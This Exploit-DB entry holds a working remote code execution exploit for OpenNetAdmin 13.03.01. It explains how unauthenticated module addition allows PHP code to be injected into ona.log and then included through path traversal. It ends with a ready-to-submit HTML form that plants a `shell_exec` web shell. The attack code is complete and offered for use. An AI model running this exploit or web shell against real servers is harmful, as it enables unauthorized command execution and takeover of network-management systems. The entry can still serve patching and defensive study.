OpenNetAdmin 13.03.01 - Remote Code Execution

2013-07-07T00:00:00
ID EDB-ID:26682
Type exploitdb
Reporter Mandat0ry
Modified 2013-07-07T00:00:00

Description

OpenNetAdmin 13.03.01 - Remote Code Execution. Webapps exploit for php platform

                                        
                                            # Exploit Title: OpenNetAdmin Remote Code Execution
# Date: 03/04/13
# Exploit Author: Mandat0ry (aka Matthew Bryant)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: http://opennetadmin.com/download.html
# Version: 13.03.01
# Tested on: Ubuntu
# CVE : No CVE exists - 0day exploit - probably works on the demo on
their site as well! So they should be alerted.

OpeNetAdmin Remote Code Execution Exploit by Mandat0ry (aka Matthew Bryant)

Info:
This exploit works because adding modules can be done without any sort
of authentication.

Modules are in this form:
module[name] = The name of the function that will be run out of the
included file
module[description] = Irrelevant description of the module (unless
some PHP code is injected here hmm?)
module[file] = The file to be included and then the function
module[name] will be run from this included file

This exploit works by injecting some PHP code into the
/var/log/ona.log file via the module description parameter.
Everytime a module is added to OpenNetAdmin the description/name/etc
are all logged into this log file.

So...

By simply setting the module filepath to
"../../../../../../../../../../../var/log/ona.log" (add or remove dots
at will) we can include the log file as a module. Where it gets clever
is remember the description is logged! So we can add PHP code into the
description and thus the logs and it will be executed on inclusion of
this file! The PHP interpreter will ignore everything not enclosed in
PHP tags so it will only run the code we inject. This is basically a
spin off of Apache log injection exploitation. Once the module has been added all you have
to do is run it via "dcm.php?module=". This all works without any
guest account etc.

NOTE: Because of the way the logger script works we cannot use any "="
in our injected code as it will be escaped before being added to the
logs ("\=") so avoid using it!

Cool software but the code has a lot to be desired, I imagine their
are a LOT more exploits than what I found but once I had RCE I was
satisfied.

Proof of concept code for easy exploitation. Run this and then go to
http://URLHERE/ona/dcm.php?module=mandat0ry for your shell!

<center>
<head>
<title>0wned Your Network</title>
<script type="text/javascript">
function changeaction()
{
    document.sploit.action = document.getElementById("url").value;
    alert('Remember, your shell must be accessed via
'+document.getElementById("url").value+'?module=mandat0ry');
}
</script>
</head>
<font size="5">OpenNetAdmin RCE Exploit</font><br />
<font size="2"><i>Now with leet button sploiting action! (oooh,
ahhh!)</i></font><br /><br />
<form action="/" method="post" name="sploit" onsubmit="changeaction()" >
URL: <input id="url" value="http://127.0.0.1/ona/dcm.php" size="50" /><br />
PHP Code to Execute: <input type="text" size="50" name="options[desc]"
value="<?php echo shell_exec($_GET[1]) ?>"/> <br />
<input type="hidden" name="module" value="add_module" />
<input type="hidden" name="options[name]" value="mandat0ry" />
<input type="hidden" name="options[file]"
value="../../../../../../../../../../../var/log/ona.log" />
<input type="submit" value="Exploit!" />
</form>
<b><i>Special thanks to: offsec, twitches, funkenstein, zachzor,
av1dmage, drc, arsinh, and the coders for OpenNetAdmin!</i></b>
</center>